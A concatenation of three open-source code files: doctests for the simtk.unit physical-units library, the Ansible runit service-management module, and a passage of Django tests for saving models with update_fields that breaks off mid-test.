>>> print(sqrt(kilogram*calorie))
kilogram*meter/second
Examples
>>> newton.get_name()
'newton'
>>> meter.get_name()
'meter'
Examples
>>> newton.get_symbol()
'N'
>>> meter.get_symbol()
'm'
Examples
>>> print(angstrom.in_unit_system(si_unit_system))
meter
>>> print(angstrom.in_unit_system(cgs_unit_system))
centimeter
>>> print(angstrom.in_unit_system(md_unit_system))
nanometer
>>> u = meter/second**2
>>> print(u)
meter/(second**2)
>>> print(u.in_unit_system(si_unit_system))
meter/(second**2)
>>> print(u.in_unit_system(cgs_unit_system))
centimeter/(second**2)
>>> print(u.in_unit_system(md_unit_system))
nanometer/(picosecond**2)
Examples
>>> meter.is_compatible(centimeter)
True
>>> meter.is_compatible(meter)
True
>>> meter.is_compatible(kelvin)
False
>>> meter.is_compatible(meter/second)
False
>>> joule.is_compatible(calorie)
True
Examples
>>> meter.conversion_factor_to(centimeter)
100.0
>>> print((md_kilocalorie/mole/angstrom).conversion_factor_to(md_kilojoule/mole/nanometer))
41.84
Examples
>>> print(meter)
meter
>>> print(meter * second * second * kilogram)
kilogram*meter*second**2
>>> print(meter / second / second / kilogram)
meter/(kilogram*second**2)
Examples
>>> print(meter**3)
meter**3
>>> print(meter**3)
meter**3
>>> meter.get_conversion_factor_to_base_units()
1.0
Simple ScaledUnit in calorie
>>> print(calorie.get_conversion_factor_to_base_units())
4.184
Compound ScaledUnit in md_kilocalorie
>>> print(md_kilocalorie.get_conversion_factor_to_base_units())
4.184
calorie in a more complex unit
>>> print((md_kilocalorie/mole/angstrom).get_conversion_factor_to_base_units())
4.184
Examples
Create simple Quantities with either the multiply operator or the Quantity constructor.
>>> print(5 * centimeters)
5 cm
>>> print(Quantity(value=5, unit=centimeter))
5 cm
>>> print(Quantity(5, centimeter))
5 cm
Extract the underlying value using either division or the value_in_unit() method.
>>> i = 5 * centimeters
>>> print(i / millimeters)
50.0
>>> print(i.value_in_unit(millimeters))
50.0
Collections of numbers can also be used as values.
>>> s = [1,2,3] * centimeters
>>> print(s)
[1, 2, 3] cm
>>> print(s / millimeters)
[10.0, 20.0, 30.0]
>>> s2 = [[1,2,3],[4,5,6]] * centimeters
>>> print(s2)
[[1, 2, 3], [4, 5, 6]] cm
>>> print(s2 / millimeters)
[[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]]
>>> s3 = [(1,2,3),(4,5,6)] * centimeters
>>> print(s3)
[(1, 2, 3), (4, 5, 6)] cm
>>> print(s3 / millimeters)
[(10.0, 20.0, 30.0), (40.0, 50.0, 60.0)]
>>> s4 = ((1,2,3),(4,5,6)) * centimeters
>>> print(s4)
((1, 2, 3), (4, 5, 6)) cm
>>> print(s4 / millimeters)
[(10.0, 20.0, 30.0), (40.0, 50.0, 60.0)]
>>> t = (1,2,3) * centimeters
>>> print(t)
(1, 2, 3) cm
>>> print(t / millimeters)
[10.0, 20.0, 30.0]
Numpy examples are commented out because not all systems have numpy installed
# >>> import numpy
# >>>
# >>> a = Quantity(numpy.array([1,2,3]), centimeters)
# >>> print(a)
# [1 2 3] cm
# >>> print(a / millimeters)
# [ 10. 20. 30.]
# >>>
# >>> a2 = Quantity(numpy.array([[1,2,3],[4,5,6]]), centimeters)
# >>> print(a2)
# [[1 2 3]
# [4 5 6]] cm
# >>> print(a2 / millimeters)
# [[ 10. 20. 30.]
# [ 40. 50. 60.]]
Addition, subtraction, multiplication, division, and powers of Quantities
exhibit correct dimensional analysis and unit conversion.
>>> x = 1.3 * meters
>>> y = 75.2 * centimeters
>>> print(x + y)
2.052 m
>>> print(x - y)
0.548 m
>>> print(x/y)
1.72872340426
>>> print(x*y)
0.9776 m**2
The following examples are derived from the C++ Boost.Units examples at
http://www.boost.org/doc/libs/1_37_0/doc/html/boost_units/Examples.html
>>>
>>> l = 2.0 * meters
>>>
>>> print(l + 2.0 * nanometers)
2.000000002 m
>>> print(2.0 * nanometers + l)
2000000002.0 nm
>>>
>>> print(l)
2.0 m
>>> print(l+l)
4.0 m
>>> print(l-l)
0.0 m
>>> print(l*l)
4.0 m**2
>>> print(l/l)
1.0
>>> print(l * meter)
2.0 m**2
>>> print(kilograms * (l/seconds) * (l/seconds))
4.0 kg m**2/(s**2)
>>> print(kilograms * (l/seconds)**2)
4.0 kg m**2/(s**2)
>>> print(l ** 3)
8.0 m**3
>>> print(l ** (3.0/2.0))
2.82842712475 m**1.5
>>> print(l ** 0.5)
1.41421356237 m**0.5
>>> print(l ** (2.0/3.0))
1.58740105197 m**0.666667
>>> # complex example
>>> l = (3.0 + 4.0j) * meters
>>> print(l)
(3+4j) m
>>> print(l+l)
(6+8j) m
>>> print(l-l)
0j m
>>> print(l*l)
(-7+24j) m**2
>>> # Numerical error yields tiny imaginary component of l/l on linux CentOS5
>>> err = abs(l/l - 1)
>>> assert err < 1e-8
>>> print(l * meter)
(3+4j) m**2
>>> print(kilograms * (l/seconds) * (l/seconds))
(-7+24j) kg m**2/(s**2)
>>> print(kilograms * (l/seconds)**2)
(-7+24j) kg m**2/(s**2)
>>> print(l ** 3)
(-117+44j) m**3
>>> print(l ** (3.0/2.0))
(2+11j) m**1.5
>>> print(l ** 0.5)
(2+1j) m**0.5
>>> print(l ** (2.0/3.0))
(2.38285471252+1.69466313833j) m**0.666667
>>> # kitchen sink example
... s1 = 2.0
>>> x1 = 2
>>> x2 = 4.0/3.0
>>> u1 = kilogram * meter / second**2
>>> u2 = u1 * meter
>>> q1 = 1.0*u1
>>> q2 = 2.0*u2
>>> print(s1)
2.0
>>> print(x1)
2
>>> print(x2)
1.33333333333
>>> print(u1)
kilogram*meter/(second**2)
>>> print(u2)
kilogram*meter**2/(second**2)
>>> print(q1)
1.0 kg m/(s**2)
>>> print(q2)
2.0 kg m**2/(s**2)
>>> print(u1*s1)
2.0 kg m/(s**2)
>>> print(s1*u1)
2.0 kg m/(s**2)
>>> print(u1/s1)
0.5 kg m/(s**2)
>>> print(s1/u1)
2.0 s**2/(kg m)
>>> print(u1*u1)
kilogram**2*meter**2/(second**4)
>>> print(u1/u1)
dimensionless
>>> print(u1*u2)
kilogram**2*meter**3/(second**4)
>>> print(u1/u2)
/meter
>>> print(u1**x1)
kilogram**2*meter**2/(second**4)
>>> print(u1**(1.0/x1))
kilogram**0.5*meter**0.5/second
>>> print(u1**x2)
kilogram**1.33333*meter**1.33333/(second**2.66667)
>>> print(u1**(1.0/x2))
kilogram**0.75*meter**0.75/(second**1.5)
>>> l1 = 1.0*meters
>>> l2 = 2.0*meters
>>> print(l1 == l2)
False
>>> print(l1 != l2)
True
>>> print(l1 <= l2)
True
>>> print(l1 < l2)
True
>>> print(l1 >= l2)
False
>>> print(l1 > l2)
False
>>>
>>> def work(f, dx):
... return f * dx
...
>>> F = 1.0 * kilogram * meter / second**2
>>> dx = 1.0 * meter
>>> E = work(F, dx)
>>>
>>> print("F = ", F)
F = 1.0 kg m/(s**2)
>>> print("dx = ", dx)
dx = 1.0 m
>>>
>>> def idealGasLaw(P, V, T):
... R = MOLAR_GAS_CONSTANT_R
... print("P * V = ", P * V)
... print("R * T = ", R * T)
... return (P * V / (R * T)).in_units_of(mole)
...
>>> T = (273.0 + 37.0) * kelvin
>>> P = 1.01325e5 * pascals
>>> r = 0.5e-6 * meters
>>> V = 4.0/3.0 * 3.14159 * r**3
>>> n = idealGasLaw(P, V, T)
P * V = 5.3053601125e-14 m**3 Pa
R * T = 2577.48646608 J/mol
>>> R = MOLAR_GAS_CONSTANT_R
>>>
>>> print("r = ", r)
r = 5e-07 m
>>> print("P = ", P)
P = 101325.0 Pa
>>> print("V = ", V)
V = 5.23598333333e-19 m**3
>>> print("T = ", T)
T = 310.0 K
>>> print("n = ", n)
n = 2.05834644811e-17 mol
>>> print("R = ", R)
R = 8.31447247122 J/(K mol)
>>> print("E = ", E)
E = 1.0 kg m**2/(s**2)
>>> print("is_quantity(V) = ", is_quantity(V))
is_quantity(V) = True
>>> print((1.0*radians) / degrees)
57.2957795131
>>> print((1.0*radians).in_units_of(degrees))
57.2957795131 deg
>>> print((1.0*angstroms).in_units_of(nanometers))
0.1 nm
>>>
>>> print((90*degrees)/radians)
1.57079632679
>>> print(sin(90*degrees))
1.0
>>> x = 90 * degrees
>>> x += 0.3 * radians
>>> print(x)
107.188733854 deg
>>> print(1 * nanometers > 1 * angstroms)
True
>>> print(1 * nanometers > 1 * degrees)
Traceback (most recent call last):
...
TypeError: Unit "degree" is not compatible with Unit "nanometer".
>>>
>>> x = 1.5 * nanometers
>>> print(x / meters)
1.5e-09
>>> x = 1.5 * angstroms
>>> print(x / meters)
1.5e-10
>>> print(x / nanometers)
0.15
Examples
>>> print(is_quantity(meters))
False
>>> print(is_quantity(2.3*meters))
True
>>> print(is_quantity(2.3))
False
Examples
>>> x = 100.0 * millimeter
>>> print(x.value_in_unit_system(si_unit_system))
0.1
>>> print(x.value_in_unit_system(cgs_unit_system))
10.0
>>> print(x.value_in_unit_system(md_unit_system))
100000000.0
>>>
>>> y = 20 * millimeters / millisecond**2
>>> print(y.value_in_unit_system(si_unit_system))
20000.0
>>> print(y.value_in_unit_system(cgs_unit_system))
2000000.0
>>> print(y.value_in_unit_system(md_unit_system))
2e-11
>>> eps = Quantity(1.0, md_kilocalorie/mole)
>>> epsQ = eps.value_in_unit_system(md_unit_system)
>>> print(epsQ)
4.184
Dimensionless quantities return their unmodified values.
>>> Quantity(5, dimensionless).value_in_unit_system(md_unit_system)
5
Examples
>>> x = 2.3*meters
>>> print(x.value_in_unit(centimeters))
230.0
Examples
>>> print(bool(2.3*meters))
True
>>> print(bool(0*meters))
False
Examples
>>> print(-(2.3*meters))
-2.3 m
>>> print(-(-2.3*meters))
2.3 m
Examples
>>> print(+(2.3*meters))
2.3 m
Examples
>>> print(abs(-2.3*meters))
2.3 m
>>> (9.0*meter*meter).sqrt()
Quantity(value=3.0, unit=meter)
>>> (9.0*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (9.0*meter*meter*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (9.0*meter*meter/second/second).sqrt()
Quantity(value=3.0, unit=meter/second)
Mixture of BaseUnits and ScaledUnits should cause no trouble:
>>> sqrt(1.0 * kilogram * joule)
Quantity(value=1.0, unit=kilogram*meter/second)
>>> sqrt(1.0 * kilogram * calorie)
Quantity(value=2.0454828280872954, unit=kilogram*meter/second)
Examples
>>> print((2.3*meters)**2)
5.29 m**2
Examples
>>> x = 4.2 * centimeters
>>> print(8.4 / x)
2.0 /cm
Examples
>>> x = 4.3 * meters
>>> print(x/centimeters)
430.0
>>> print(x/seconds)
4.3 m/s
>>> x = [1,2,3]*centimeter
>>> x/millimeter
[10.0, 20.0, 30.0]
Examples
>>> x = 1.2*meters
>>> print(5*x)
6.0 m
Examples
>>> x = 1.2*meters
>>> y = 72*centimeters
>>> print(x*y)
0.864 m**2
>>> x = [1,2,3]*centimeter
>>> x
Quantity(value=[1, 2, 3], unit=centimeter)
>>> x * meter
Quantity(value=[100.0, 200.0, 300.0], unit=centimeter**2)
>>> u = nanometer**2/angstrom**2
>>> print(u)
nanometer**2/(angstrom**2)
>>> q = Quantity(2.0, u)
>>> q
Quantity(value=2.0, unit=nanometer**2/(angstrom**2))
>>> "%.1f" % q.reduce_unit()
'200.0'
Examples
>>> 1.2*meters < 72*centimeters
False
>>> meter != None
True
>>> meter == None
False
Examples
>>> print(1.2 * meters - 72 * centimeters)
0.48 m
Examples
>>> print(1.2 * meters + 72 * centimeters)
1.92 m
Examples
>>> print(repr(1.2*meter))
Quantity(value=1.2, unit=meter)
Examples
>>> print(5.0 * nanometers)
5.0 nm
Examples
>>> Quantity(5.0, meters)
Quantity(value=5.0, unit=meter)
>>> Quantity([1*angstrom,2*nanometer,3*angstrom])
Quantity(value=[1, 20.0, 3], unit=angstrom)
>>> Quantity((1,2,3))
Quantity(value=(1, 2, 3), unit=dimensionless)
>>> Quantity([1*angstrom,2*nanometer,3*angstrom])
Quantity(value=[1, 20.0, 3], unit=angstrom)
>>> Quantity([1*angstrom,2*nanometer,3*second])
Traceback (most recent call last):
...
TypeError: Unit "second" is not compatible with Unit "angstrom".
>>> Quantity(5)
Quantity(value=5, unit=dimensionless)
Passing a unit to the constructor yields a Quantity with an empty list value.
>>> Quantity(angstrom)
Quantity(value=[], unit=angstrom)
>>> Quantity(5*angstrom)
Quantity(value=5, unit=angstrom)
>>> Quantity(([1*angstrom,2*nanometer,3*angstrom], [1*angstrom,4*nanometer,3*angstrom]))
Quantity(value=([1, 20.0, 3], [1, 40.0, 3]), unit=angstrom)
>>> Quantity([])
Quantity(value=[], unit=dimensionless)
A simple scalar Quantity can be used as the unit argument.
>>> Quantity(value=5.0, unit=100.0*meters)
Quantity(value=500.0, unit=meter)
Examples
>>> x = 2.3*meters
>>> y = x.in_units_of(centimeters)
>>> print(y)
230.0 cm
>>> x = 2.3*meters
>>> print(x.in_units_of(centimeters))
230.0 cm
>>> print(x.in_units_of(seconds))
Traceback (most recent call last):
...
TypeError: Unit "meter" is not compatible with Unit "second".
Examples
>>> x = 100.0 * millimeter
>>> print(x)
100.0 mm
>>> print(x.in_unit_system(si_unit_system))
0.1 m
>>> print(x.in_unit_system(cgs_unit_system))
10.0 cm
>>> print(x.in_unit_system(md_unit_system))
100000000.0 nm
>>> y = 20 * millimeters / millisecond**2
>>> print(y)
20 mm/(ms**2)
>>> print(y.in_unit_system(si_unit_system))
20000.0 m/(s**2)
>>> print(y.in_unit_system(cgs_unit_system))
2000000.0 cm/(s**2)
>>> print(y.in_unit_system(md_unit_system))
2e-11 nm/(ps**2)
Sometimes mixed internal units have caused trouble:
>>> q = 1.0 * md_kilocalorie/mole/angstrom
>>> print(q.in_units_of(md_kilojoule/mole/nanometer))
41.84 kJ/(nm mol)
Examples
>>> class Foo:
... def bar(self):
... print("bar")
...
>>> x = Foo()
>>> x.bar()
bar
>>> y = x * nanometers
>>> y.bar()
bar
Examples
>>> print(meters * centimeters)
centimeter*meter
>>> print(meters * meters)
meter**2
>>> print(meter * meter )
meter**2
Examples
>>> print(meter / 2)
0.5 m
Examples
>>> define_prefixed_units(kelvin_base_unit, sys.modules["__main__"])
>>> from __main__ import millikelvin
>>> print(5.0 * millikelvin)
5.0 mK
Creating a new BaseUnit:
>>> ms = milli * second_base_unit
>>> ms
BaseUnit(base_dim=BaseDimension("time"), name="millisecond", symbol="ms")
>>> ms.conversion_factor_to(second_base_unit)
0.001
Creating a new ScaledUnit:
>>> mC = milli * ScaledUnit(4.184, joule, "calorie", "cal")
>>> mC
ScaledUnit(factor=0.0041840000000000002, master=joule, name='millicalorie', symbol='mcal')
Creating a new Unit:
>>> ms = milli * second
>>> ms
Unit({BaseUnit(base_dim=BaseDimension("time"), name="millisecond", symbol="ms"): 1.0})
Don't try a Quantity though:
>>> ms = milli * (1.0 * second)
Traceback (most recent call last):
...
TypeError: Unit prefix "milli" can only be applied to a Unit, BaseUnit, or ScaledUnit.
Comparison of dimensionless quantities issue (fixed in svn 513)
>>> x = Quantity(1.0, dimensionless)
>>> y = Quantity(1.0, dimensionless)
>>> assert not x is y
>>> assert x == y
Formatting of Quantities
>>> x = 5.439999999 * picosecond
>>> x
Quantity(value=5.4399999990000003, unit=picosecond)
>>> x.format("%.3f")
'5.440 ps'
# Bug report Dec 17, 2009 from John Chodera
# deepcopy of Quantity containing numpy array wrongly strips units
>>> try:
... import numpy
... import copy
... x = Quantity(numpy.zeros([2,3]), nanometer)
... y = copy.deepcopy(x)
... assert x[0][0] == y[0][0]
... except ImportError:
... pass
# Passing a string through Quantity constructor should return a string/dimensionless
>>> x = Quantity("string").value_in_unit_system(md_unit_system)
>>> assert x == "string"
# Trouble with complicated unit conversion factors
# Jan 29 1010 email from John Chodera
>>> p1 = 1.0 * atmosphere
>>> p2 = (1.0 * atmosphere).in_units_of(joule/nanometer**3)
>>> V = 2.4 * nanometer**3
>>> beta = 4.e-4 * mole/joule
>>> x1 = beta*p1*V
>>> # print(x1)
... y1 = x1 * AVOGADRO_CONSTANT_NA
>>> print(y1)
0.0585785776197
# Wrong answer is 5.85785776197e+25
>>> x2 = beta*p2*V
>>> # print(x2)
... y2 = x2 * AVOGADRO_CONSTANT_NA
>>> print(y2)
0.0585785776197
>>> assert( abs(y1 - y2) < 0.01)
# division of numpy arrays error
# April 2010, thanks to John Chodera for reporting
>>> try:
... import numpy
... x = Quantity(numpy.array([1.,2.]), nanometer)
... y = Quantity(numpy.array([3.,4.]), picosecond)
... assert str(x/y) == '[ 0.33333333 0.5 ] nm/ps'
... except ImportError:
... pass
# another numpy problem from retarded implementation of == operator
# Thanks to Kyle Beauchamp July 2010
>>> try:
... import numpy
... from simtk.unit.quantity import _is_string
... a = numpy.array([[1,2,3],[4,5,6]])
... assert isinstance("", str)
... assert _is_string("")
... assert _is_string("t")
... assert _is_string("test")
... assert not _is_string(3)
... assert not _is_string(a)
... except ImportError:
... pass
"""
from __future__ import print_function
__author__ = "Christopher M. Bruns"
__version__ = "0.5"
# This unit code might be found in different packages...
# So use local import
from baseunit import BaseUnit
from standard_dimensions import *
from unit import is_unit, dimensionless
from quantity import Quantity, is_quantity, is_dimensionless
from unit_definitions import *
from unit_math import *
from constants import *
# run module directly for testing
if __name__=='__main__':
# Test the examples in the docstrings
import doctest, sys
(failed, passed) = doctest.testmod(sys.modules[__name__])
# For use in automated testing, return number of failed tests as exit code
exit(failed)
|
lgpl-2.1
|
sorenk/ansible
|
lib/ansible/modules/system/runit.py
|
64
|
8646
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2015, Brian Coca <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
# This is a modification of @bcoca's `svc` module
DOCUMENTATION = '''
---
module: runit
author:
- James Sumners (@jsumners)
version_added: "2.3"
short_description: Manage runit services
description:
- Controls runit services on remote hosts using the sv utility.
options:
name:
description:
- Name of the service to manage.
required: yes
state:
description:
- C(started)/C(stopped) are idempotent actions that will not run
commands unless necessary. C(restarted) will always bounce the
service (sv restart) and C(killed) will always bounce the service (sv force-stop).
C(reloaded) will send a HUP (sv reload).
C(once) will run a normally downed sv once (sv once), not really
an idempotent operation.
choices: [ killed, once, reloaded, restarted, started, stopped ]
enabled:
description:
- Whether the service is enabled or not, if disabled it also implies stopped.
type: bool
service_dir:
description:
- directory runsv watches for services
default: /var/service
service_src:
description:
- directory where services are defined, the source of symlinks to service_dir.
default: /etc/sv
'''
EXAMPLES = '''
- name: Start sv dnscache, if not running
runit:
name: dnscache
state: started
- name: Stop sv dnscache, if running
runit:
name: dnscache
state: stopped
- name: Kill sv dnscache, in all cases
runit:
name: dnscache
state: killed
- name: Restart sv dnscache, in all cases
runit:
name: dnscache
state: restarted
- name: Reload sv dnscache, in all cases
runit:
name: dnscache
state: reloaded
- name: Use alternative sv directory location
runit:
name: dnscache
state: reloaded
service_dir: /run/service
'''
import os
import re
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
def _load_dist_subclass(cls, *args, **kwargs):
'''
Used for derivative implementations
'''
subclass = None
distro = kwargs['module'].params['distro']
# get the most specific superclass for this platform
if distro is not None:
for sc in cls.__subclasses__():
if sc.distro is not None and sc.distro == distro:
subclass = sc
if subclass is None:
subclass = cls
return super(cls, subclass).__new__(subclass)
class Sv(object):
"""
Main class that handles daemontools, can be subclassed and overridden in case
we want to use a 'derivative' like encore, s6, etc
"""
# def __new__(cls, *args, **kwargs):
# return _load_dist_subclass(cls, args, kwargs)
def __init__(self, module):
self.extra_paths = []
self.report_vars = ['state', 'enabled', 'svc_full', 'src_full', 'pid', 'duration', 'full_state']
self.module = module
self.name = module.params['name']
self.service_dir = module.params['service_dir']
self.service_src = module.params['service_src']
self.enabled = None
self.full_state = None
self.state = None
self.pid = None
self.duration = None
self.svc_cmd = module.get_bin_path('sv', opt_dirs=self.extra_paths, required=True)
self.svstat_cmd = module.get_bin_path('sv', opt_dirs=self.extra_paths)
self.svc_full = '/'.join([self.service_dir, self.name])
self.src_full = '/'.join([self.service_src, self.name])
self.enabled = os.path.lexists(self.svc_full)
if self.enabled:
self.get_status()
else:
self.state = 'stopped'
def enable(self):
if os.path.exists(self.src_full):
try:
os.symlink(self.src_full, self.svc_full)
except OSError as e:
self.module.fail_json(path=self.src_full, msg='Error while linking: %s' % to_native(e))
else:
self.module.fail_json(msg="Could not find source for service to enable (%s)." % self.src_full)
def disable(self):
self.execute_command([self.svc_cmd, 'force-stop', self.src_full])
try:
os.unlink(self.svc_full)
except OSError as e:
self.module.fail_json(path=self.svc_full, msg='Error while unlinking: %s' % to_native(e))
def get_status(self):
(rc, out, err) = self.execute_command([self.svstat_cmd, 'status', self.svc_full])
if err is not None and err:
self.full_state = self.state = err
else:
self.full_state = out
# full_state *may* contain information about the logger:
# "down: /etc/service/service-without-logger: 1s, normally up\n"
# "down: /etc/service/updater: 127s, normally up; run: log: (pid 364) 263439s\n"
full_state_no_logger = self.full_state.split("; ")[0]
m = re.search(r'\(pid (\d+)\)', full_state_no_logger)
if m:
self.pid = m.group(1)
m = re.search(r' (\d+)s', full_state_no_logger)
if m:
self.duration = m.group(1)
if re.search(r'^run:', full_state_no_logger):
self.state = 'started'
elif re.search(r'^down:', full_state_no_logger):
self.state = 'stopped'
else:
self.state = 'unknown'
return
def started(self):
return self.start()
def start(self):
return self.execute_command([self.svc_cmd, 'start', self.svc_full])
def stopped(self):
return self.stop()
def stop(self):
return self.execute_command([self.svc_cmd, 'stop', self.svc_full])
def once(self):
return self.execute_command([self.svc_cmd, 'once', self.svc_full])
def reloaded(self):
return self.reload()
def reload(self):
return self.execute_command([self.svc_cmd, 'reload', self.svc_full])
def restarted(self):
return self.restart()
def restart(self):
return self.execute_command([self.svc_cmd, 'restart', self.svc_full])
def killed(self):
return self.kill()
def kill(self):
return self.execute_command([self.svc_cmd, 'force-stop', self.svc_full])
def execute_command(self, cmd):
try:
(rc, out, err) = self.module.run_command(' '.join(cmd))
except Exception as e:
self.module.fail_json(msg="failed to execute: %s" % to_native(e), exception=traceback.format_exc())
return (rc, out, err)
def report(self):
self.get_status()
states = {}
for k in self.report_vars:
states[k] = self.__dict__[k]
return states
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True),
state=dict(type='str', choices=['killed', 'once', 'reloaded', 'restarted', 'started', 'stopped']),
enabled=dict(type='bool'),
dist=dict(type='str', default='runit'),
service_dir=dict(type='str', default='/var/service'),
service_src=dict(type='str', default='/etc/sv'),
),
supports_check_mode=True,
)
module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')
state = module.params['state']
enabled = module.params['enabled']
sv = Sv(module)
changed = False
orig_state = sv.report()
if enabled is not None and enabled != sv.enabled:
changed = True
if not module.check_mode:
try:
if enabled:
sv.enable()
else:
sv.disable()
except (OSError, IOError) as e:
module.fail_json(msg="Could not change service link: %s" % to_native(e), exception=traceback.format_exc())
if state is not None and state != sv.state:
changed = True
if not module.check_mode:
getattr(sv, state)()
module.exit_json(changed=changed, sv=sv.report())
if __name__ == '__main__':
main()
|
gpl-3.0
|
zanderle/django
|
tests/update_only_fields/tests.py
|
296
|
9780
|
from __future__ import unicode_literals
from django.db.models.signals import post_save, pre_save
from django.test import TestCase
from .models import Account, Employee, Person, Profile, ProxyEmployee
class UpdateOnlyFieldsTests(TestCase):
def test_update_fields_basic(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s.gender = 'M'
s.name = 'Ian'
s.save(update_fields=['name'])
s = Person.objects.get(pk=s.pk)
self.assertEqual(s.gender, 'F')
self.assertEqual(s.name, 'Ian')
def test_update_fields_deferred(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.defer("gender", "pid").get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_1(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_2(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(2):
s1.save(update_fields=['pid'])
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Sara")
self.assertEqual(s2.gender, "F")
def test_update_fields_only_repeated(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.gender = 'M'
with self.assertNumQueries(1):
s1.save()
# Test that the deferred class does not remember that gender was
# set, instead the instance should remember this.
s1 = Person.objects.only('name').get(pk=s.pk)
with self.assertNumQueries(1):
s1.save()
def test_update_fields_inheritance_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('name').get(pk=e1.pk)
e1.name = 'Linda'
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).name,
'Linda')
def test_update_fields_fk_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile').get(pk=e1.pk)
e1.profile = profile_receptionist
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_receptionist)
e1.profile_id = profile_boss.pk
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_boss)
def test_select_related_only_interaction(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile__salary').select_related('profile').get(pk=e1.pk)
profile_boss.name = 'Clerk'
profile_boss.salary = 1000
profile_boss.save()
# The loaded salary of 3000 gets saved, the name of 'Clerk' isn't
# overwritten.
with self.assertNumQueries(1):
e1.profile.save()
reloaded_profile = Profile.objects.get(pk=profile_boss.pk)
self.assertEqual(reloaded_profile.name, profile_boss.name)
self.assertEqual(reloaded_profile.salary, 3000)
def test_update_fields_m2m(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
a1 = Account.objects.create(num=1)
a2 = Account.objects.create(num=2)
e1.accounts = [a1, a2]
with self.assertRaises(ValueError):
e1.save(update_fields=['accounts'])
def test_update_fields_inheritance(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
with self.assertNumQueries(1):
e3.profile = profile_boss
e3.save(update_fields=['profile_id'])
e4 = Employee.objects.get(pk=e3.pk)
self.assertEqual(e4.profile, profile_boss)
self.assertEqual(e4.profile_id, profile_boss.pk)
def test_update_fields_inheritance_with_proxy_model(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = ProxyEmployee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
def test_update_fields_signals(self):
p = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
p.save(update_fields=['name'])
self.assertEqual(len(pre_save_data), 1)
self.assertEqual(len(pre_save_data[0]), 1)
self.assertIn('name', pre_save_data[0])
self.assertEqual(len(post_save_data), 1)
self.assertEqual(len(post_save_data[0]), 1)
self.assertIn('name', post_save_data[0])
pre_save.disconnect(pre_save_receiver)
post_save.disconnect(post_save_receiver)
def test_update_fields_incorrect_params(self):
s = Person.objects.create(name='Sara', gender='F')
with self.assertRaises(ValueError):
